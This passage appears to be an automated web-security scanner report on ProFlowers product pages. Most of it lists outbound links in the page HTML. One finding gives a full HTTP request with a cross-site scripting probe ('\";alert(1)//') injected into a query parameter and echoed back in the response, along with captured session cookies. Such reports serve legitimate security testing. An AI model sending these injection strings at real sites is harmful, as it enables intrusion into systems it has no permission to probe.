<li id="berriesLink" class="ourBrandsLi"> <a border="0" rel="nofollow" href="http://www.berries.com/default.aspx?tile=hmpg_carousel&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:31px;width:130px;"><img height=31px width=130px height="31px" width="130px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<div class="displayMoreInfo"> <a border="0" rel="nofollow" href="http://www.berries.com/default.aspx?tile=hmpg_carousel&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/SB_dropdown.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<a id="productDetailBody_ctl09__homeLink" border="0" title="Go to ProFlowers Homepage" href="http://www.proflowers.com/?tile=hmpg_carousel&amp;Ref=HomeNoRef"><img class="PFLogo" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="ProFlowers Delivery - Send Flowers, Gifts, and Plants" style="border-width:0px;" /></a>
...[SNIP]...
<li><a class="headerLink" href="http://www.bridesign.com" target="_blank">Wedding</a>
...[SNIP]...
<div class="rushDeliveryBox StandardSize">Need it <a id="productDetailBody_ctl09_ctl91__repeater_ctl00__pcHyperLink" rel="nofollow" href="http://www.floristexpress.net?refcode=XSD&amp;RefPage=PFC_PRODUCT-30050137" target="_blank">Today</a>
...[SNIP]...
<a href="http://www.proflowers.com/radio/default.aspx?tile=hmpg_carousel&amp;Ref=HomeNoRef&amp;how=home"><img class="RadioIcon_Control" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="ProFlowers on the Radio" style="border-width:0px;" /></a>
...[SNIP]...
<div style="margin:0px 0 5 0;"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</a> <a class="Lckdwn3_Nav_PFC_Mothers_Show" href="http://www.floristexpress.net?pfc=1&amp;refcode=MDN&amp;LinkLocation=NavBar">Mother's Day</a>
...[SNIP]...
<li class="Lckdwn3_Nav_PFC_Occasion_Show"><a class="mothersDay" href="http://www.floristexpress.net?pfc=1&amp;refcode=OMD&amp;LinkLocation=NavBar">Mother's Day - 5/8</a>
...[SNIP]...
<li><a rel="nofollow" class="floristDelivery" href="http://www.floristexpress.net?refcode=PFC&amp;LinkLocation=NavBar">Local Florist Delivery</a>
...[SNIP]...
<li style="border-bottom:none;"><a class="wedding" href="http://www.bridesign.com" target="_blank">Wedding Flowers</a>
...[SNIP]...
<li class="Lckdwn3_Nav_PFC_Flowers_Hide"><a rel="nofollow" class="floristDelivery" href="http://www.floristexpress.net?refcode=pfc&amp;LinkLocation=NavBar">Florist Delivery</a>
...[SNIP]...
<li class="Lckdwn3_Nav_PFC_Flowers_Show"><a rel="nofollow" class="floristDelivery" href="http://www.floristexpress.net?pfc=1&amp;refcode=FMD&amp;LinkLocation=NavBar">Florist Delivery</a>
...[SNIP]...
<div class="searchBarBottom"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
Body_ctl09_ctl117_submit2" prvdid="productsearchlink" rel="nofollow" type="image" href="http://www.proflowers.com/ProductSearch.aspx?Ref=HomeNoRef" style="display:inline-block;height:18px;width:48px;"><img class="sch_smallGoBottom sch_smallGoBottomAlt" height="18px" width="48px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<a href="javascript:O_LC();" ><img src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/sm_FFF_oo.gif" border="0" width="9" height="9" style="vertical-align:middle;" title="site feedback"></a>
...[SNIP]...
<div class="ProductInfoImage">
                           <img id="productDetailBody_productImage" class="productimagedimension" border="0" prvdid="productImage" RenderDivWhenInvisible="true" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PF_11_00000000M232_VA0606_W1_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=300&amp;hei=350" style="height:350px;width:300px;border-width:0px;" />
                       </div>
...[SNIP]...
<div id="productDetailBody_FlynnMagazeeny_divPicture" class="magPicture"> <img id="productDetailBody_FlynnMagazeeny_imgPicture" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/NTR_PD_Body_PFC_FLN_50_67_ReadersDigest_TB.gif" style="border-width:0px;" /> </div>
...[SNIP]...
<div class="StepImage"><img id="productDetailBody_shUpgradesHeader_image" class="Step_1" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" style="border-width:0px;" /></div>
...[SNIP]...
<div class="StepImage"><img id="productDetailBody_shMainAccessorySelectionHeader_image" class="Step_2" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" style="border-width:0px;" /></div>
...[SNIP]...
<td align="center"><img id="productDetailBody_accMainAccSelection_productList_ctl00_ctl00_Pcimage1" class="invisibleImageHeader" prvdid="imageheader" NAME="Pcimage1" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/arrow-down.gif" style="border-width:0px;" /></td>
...[SNIP]...
<td class="accessoryImageBorder" valign="top" style="background-color:#FFFFFF"><img id="productDetailBody_accMainAccSelection_productList_ctl00_ctl00__productImage" prvdid="productimage" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ACC_purpletrumpet_VA0211_11_SQ?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;hei=73" style="height:73px;border-width:0px;" /></td>
...[SNIP]...
<td align="center"><img id="productDetailBody_accMainAccSelection_productList_ctl00_ctl00_Pcimage2" class="invisibleImageFooter" prvdid="imagefooter" NAME="Pcimage2" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/arrow-up.gif" style="border-width:0px;" /></td>
...[SNIP]...
<td align="center"><img id="productDetailBody_accMainAccSelection_productList_ctl01_ctl00_Pcimage1" class="invisibleImageHeader" prvdid="imageheader" NAME="Pcimage1" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/arrow-down.gif" style="border-width:0px;" /></td>
...[SNIP]...
<td class="accessoryImageBorder" valign="top" style="background-color:#FFFFFF"><img id="productDetailBody_accMainAccSelection_productList_ctl01_ctl00__productImage" prvdid="productimage" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/palepink_tn?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;hei=73" style="height:73px;border-width:0px;" /></td>
...[SNIP]...
<td align="center"><img id="productDetailBody_accMainAccSelection_productList_ctl01_ctl00_Pcimage2" class="invisibleImageFooter" prvdid="imagefooter" NAME="Pcimage2" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/arrow-up.gif" style="border-width:0px;" /></td>
...[SNIP]...
<td align="center"><img id="productDetailBody_accMainAccSelection_productList_ctl02_ctl00_Pcimage1" class="invisibleImageHeader" prvdid="imageheader" NAME="Pcimage1" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/arrow-down.gif" style="border-width:0px;" /></td>
...[SNIP]...
<td class="accessoryImageBorder" valign="top" style="background-color:#FFFFFF"><img id="productDetailBody_accMainAccSelection_productList_ctl02_ctl00__productImage" prvdid="productimage" class="selectedImage" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ContempoVase_tn?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;hei=73" style="height:73px;border-width:0px;" /></td>
...[SNIP]...
<td align="center"><img id="productDetailBody_accMainAccSelection_productList_ctl02_ctl00_Pcimage2" class="invisibleImageFooter" prvdid="imagefooter" NAME="Pcimage2" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/arrow-up.gif" style="border-width:0px;" /></td>
...[SNIP]...
<td align="center"><img id="productDetailBody_accMainAccSelection_productList_ctl03_ctl00_Pcimage1" class="invisibleImageHeader" prvdid="imageheader" NAME="Pcimage1" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/arrow-down.gif" style="border-width:0px;" /></td>
...[SNIP]...
<td class="accessoryImageBorder" valign="top" style="background-color:#FFFFFF"><img id="productDetailBody_accMainAccSelection_productList_ctl03_ctl00__productImage" prvdid="productimage" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/GingerVase_tn?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;hei=73" style="height:73px;border-width:0px;" /></td>
...[SNIP]...
<td align="center"><img id="productDetailBody_accMainAccSelection_productList_ctl03_ctl00_Pcimage2" class="invisibleImageFooter" prvdid="imagefooter" NAME="Pcimage2" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/arrow-up.gif" style="border-width:0px;" /></td>
...[SNIP]...
<td id="productDetailBody_accMainAccSelection_noAccHeight" align="center" style="height:88px;background-color:#FFFFFF;"><img id="productDetailBody_accMainAccSelection__pcImage2" prvdid="infoimage" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//images/noVase.gif" style="height:48px;width:47px;border-width:0px;" /></td>
...[SNIP]...
<div class="StepImage"><img id="productDetailBody_shZipCodeHeader_image" class="Step_4" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" style="border-width:0px;" /></div>
...[SNIP]...
<div class="StepImage"><img id="productDetailBody_shDeliveryDateSelectionHeader_image" class="Step_3" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" style="border-width:0px;" /></div>
...[SNIP]...
<div id="productDetailBody_deliveryCalendar" prvdid="calendarparentcontrol"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-ui-1.7.1.core_draggable.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/ui.dialog.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucdeliverycalendarcustom.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<li>
                           <a id="productDetailBody_deliveryCalendar_ctl18__dataList_ctl00__pcHyperLink" Class="Underlined" href="http://www.floristexpress.net/?pfc=1&amp;refcode=ORD&amp;RefPage=PFC_PRODUCT-30050137" target="_blank">Today</a>
...[SNIP]...
<li>
                           <a id="productDetailBody_deliveryCalendar_ctl18__dataList_ctl01__pcHyperLink" Class="Underlined" href="http://www.floristexpress.net?pfc=1&amp;refcode=ZSU&amp;RefPage=PFC_PRODUCT-30050137" target="_blank">Sunday</a>
...[SNIP]...
<td align="left" valign="top" style="width:28px;"><img id="productDetailBody_deliveryCalendar_Image1" class="calendar_button" prvdid="calendar_button" alt="" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/Siteimages/icon_Calendar_DeliveryTime.gif" src="" style="border-width:0px;margin-left:5px; cursor:pointer;" /></td>
...[SNIP]...
</div>

                           
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-ui-1.7.1.core_draggable.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/ui.dialog.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/giftsmartoverlay.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<li>
                   <a id="productDetailBody_ctl14__dataList_ctl00__pcHyperLink" href="http://www.floristexpress.net/?pfc=1&amp;refcode=ORD&amp;RefPage=PFC_PRODUCT-30050137" target="_blank">Today</a>
...[SNIP]...
<li>
                   <a id="productDetailBody_ctl14__dataList_ctl01__pcHyperLink" href="http://www.floristexpress.net?pfc=1&amp;refcode=ZSU&amp;RefPage=PFC_PRODUCT-30050137" target="_blank">Sunday</a>
...[SNIP]...
<div class="AccessoryImages">
       <img id="productDetailBody_accPreview_Repeater1_ctl00_ctl00__productImage" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/summerchocolates08_tn?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=50&amp;hei=50" style="height:50px;width:50px;border-width:0px;" />
<img id="productDetailBody_accPreview_Repeater1_ctl01_ctl00__productImage" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/accgenblue09_tn?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=50&amp;hei=50" style="height:50px;width:50px;border-width:0px;" />

   </div>
...[SNIP]...
" vspace="3" href="http://products.proflowers.com/flowers/Deluxe-Hugs-and-Kisses-5519?trackingpgroup=YMA&amp;tile=hmpg_carousel&amp;Ref=HomeNoRef" style="display:inline-block;height:100px;width:86px;"><img height="100px" width="86px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxhugskiss_rbyg11_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=86&amp;hei=100" alt="Deluxe Hugs and Kisses" style="border-width:0px;" /></a>
...[SNIP]...
space="3" href="http://products.proflowers.com/flowers/Mardi-Gras-Orchid-Garden-42864?trackingpgroup=YMA&amp;tile=hmpg_carousel&amp;Ref=HomeNoRef" style="display:inline-block;height:100px;width:86px;"><img height="100px" width="86px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORCbromgrdnblk07_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=86&amp;hei=100" alt="Mardi Gras Orchid Garden" style="border-width:0px;" /></a>
...[SNIP]...
<div id="PFCfooterRibbonImage"><img id="productDetailBody_PCImage1" class="Ribbon25Mil" text="25 Million Orders Shipped" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" style="border-width:0px;" /></div>
...[SNIP]...
orized use is prohibited.* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. US 6606581, 6421724, 6785717 B1 and other patents pending. * http://www.opinionlab.com--><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
"text" value="Enter Your Email Here" id="productDetailBody_footer_emailInput" class="textBox" onclick="javascript:this.value=&#39;&#39;;" onkeypress="return CaptureEnterInEmailEntry(footerClientID)" /><img onclick="SetEmailEntryUrl()" class="sch_smallGo" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="Sign Up for Email Savings" width="17" height="18" border="0" /></div>
...[SNIP]...
<a href="javascript:O_LC();" ><img src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/sm_FFF_oo.gif" border="0" width="9" height="9" style="vertical-align:middle;" title="site feedback"></a>
...[SNIP]...
</a><a rel="nofollow" href="http://www.prvd.com/Careers_Overview.aspx">CAREERS</a>
...[SNIP]...
</a><a rel="nofollow" href="http://www.providecommerce.com/privacy.aspx">PRIVACY POLICY</a>
...[SNIP]...
</a><a rel="nofollow" href="http://www.providecommerce.com/terms.aspx">TERMS OF USE</a>
...[SNIP]...
</div><img class="shopOurBrandFamily" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" style="height:20px;width:181px;border-width:0px;" /> <br />
...[SNIP]...
itle="The freshest flowers, guaranteed to last at least 7 days." border="0" href="http://www.proflowers.com/?tile=hmpg_carousel&amp;Ref=HomeNoRef" style="display:inline-block;height:61px;width:124px;"><img class="footerLogo_PFC" height="61px" width="124px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="The freshest flowers, guaranteed to last at least 7 days." style="border-width:0px;" /></a> <a title="A wide selection of green and exotic plants, perfect for gift and home d..cor." border="0" rel="nofollow" href="http://www.proplants.com/?tile=hmpg_carousel&amp;Ref=HomeNoRef" style="display:inline-block;height:61px;width:117px;"><img class="footerLogo_PLA" height=61px width=117px class="footerLogo_PLA" height="61px" width="117px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="A wide selection of green and exotic plants, perfect for gift and home d..cor." style="border-width:0px;" /></a>
...[SNIP]...
itle="International flower delivery" border="0" rel="nofollow" href="http://www.proflowers.com/international?tile=hmpg_carousel&amp;Ref=HomeNoRef" style="display:inline-block;height:61px;width:132px;"><img class="footerLogo_PFCint" height=61px width=132px class="footerLogo_PFCint" height="61px" width="132px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="International flower delivery" style="border-width:0px;" /></a> <a title="The place for unique and personalized gifts." border="0" rel="nofollow" href="http://www.redenvelope.com/?tile=hmpg_carousel&amp;Ref=HomeNoRef" style="display:inline-block;height:61px;width:156px;"><img class="footerLogo_RED" height=61px width=156px class="footerLogo_RED" height="61px" width="156px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="The place for unique and personalized gifts." style="border-width:0px;" /></a> <a title="Farm fresh fruit, gift baskets and delicious hand-made sweets." border="0" rel="nofollow" href="http://www.cherrymoonfarms.com/?tile=hmpg_carousel&amp;Ref=HomeNoRef" style="display:inline-block;height:61px;width:170px;"><img class="footerLogo_CMF" height=61px width=170px class="footerLogo_CMF" height="61px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="Farm fresh fruit, gift baskets and delicious hand-made sweets." style="border-width:0px;" /></a> <a title="Unique personalized gifts for life...s special occasions." border="0" href="http://www.personalcreations.com/?tile=hmpg_carousel&amp;Ref=HomeNoRef" style="display:inline-block;height:61px;width:179px;"><img class="footerLogo_PCR" height=61px width=179px class="footerLogo_PCR" height="61px" width="179px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="Unique personalized gifts for life...s special occasions." style="border-width:0px;" /></a> <a title="Gourmet hand-dipped berries, cookies and cakes." border="0" href="http://www.berries.com/?tile=hmpg_carousel&amp;Ref=HomeNoRef" style="display:inline-block;height:61px;width:89px;"><img class="footerLogo_SHB" height=61px width=89px class="footerLogo_SHB" height="61px" width="89px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="Gourmet hand-dipped berries, cookies and cakes." style="border-width:0px;" /></a>
...[SNIP]...
<br /><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
horized use is prohibited.* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. US 6606581, 6421724, 6785717 B1 and other patents pending.* http://www.opinionlab.com--><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.05.07.2"></script><!--ooend--><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/swfobject.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/tvvideopopup.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script>
   <script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
       <img src="http://link.mercent.com/image.ashx?merchantID=ProFlowers" style="display: none;">
   </noscript>
...[SNIP]...
</span>


       <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/instantservicechat.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</span>


<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/certona/resxclsa.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...

3.2. http://products.proflowers.com/flowers/Deluxe-Succulent-Garden-30008396  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/Deluxe-Succulent-Garden-30008396

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /flowers/Deluxe-Succulent-Garden-30008396?viewpos=1&trackingpgroup=PBS&tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&Ref=HomeNoRef HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA1abf9\%22%3balert(1)//e408dc57373&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX,NFX; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:16:38 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253ACategory%25253Aproductgroup%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fproducts.proflowers.com%25252Fflowers%25252FDeluxe-Succulent-Garden-30008396%25253Fviewpos%25253D1%252526trackingpgroup%25253DPBS%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:16:38 AM?30008396&5/9/2011 5:18:27 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:18:27 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:18:27 GMT
Content-Length: 136888


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
<p>
   1) Enable Javascript. To find out how: <A href="https://www.google.com/support/adsense/bin/answer.py?answer=12654" target="_blank">click here</a>
...[SNIP]...
</title>
<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pfc_common.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pfc_brandfonts.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pfc_productdetail.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pfc_lockdown.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/deliverycalendarcustom.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/deliverycalendarcustom_pfc.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' />
       <meta id="_metaDescription" name="Description" content="Send flowers and gifts including Deluxe Succulent Garden from ProFlowers.com. Flowers and gifts are available for any holiday or occasion.">
...[SNIP]...
<div>
   
           
                           <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js"></script>


<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/productdetails.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<input type="hidden" name="productDetailBody$_hdQS" id="productDetailBody__hdQS" />
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsetselectionsimple.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucpersonalizationselection.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<div id="innerContainer">
           <link rel="shortcut icon" href="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/favicon.ico"/> <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
l="nofollow" href="http://www.proflowers.com/default.aspx?tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:31px;width:120px;"><img height=31px width=120px height="31px" width="120px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
l="nofollow" href="http://www.proflowers.com/default.aspx?tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/PF_dropdown.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<li id="proPlantsLink" class="ourBrandsLi"> <a border="0" rel="nofollow" href="http://www.proplants.com/default.aspx?tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:31px;width:121px;"><img height=31px width=121px height="31px" width="121px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
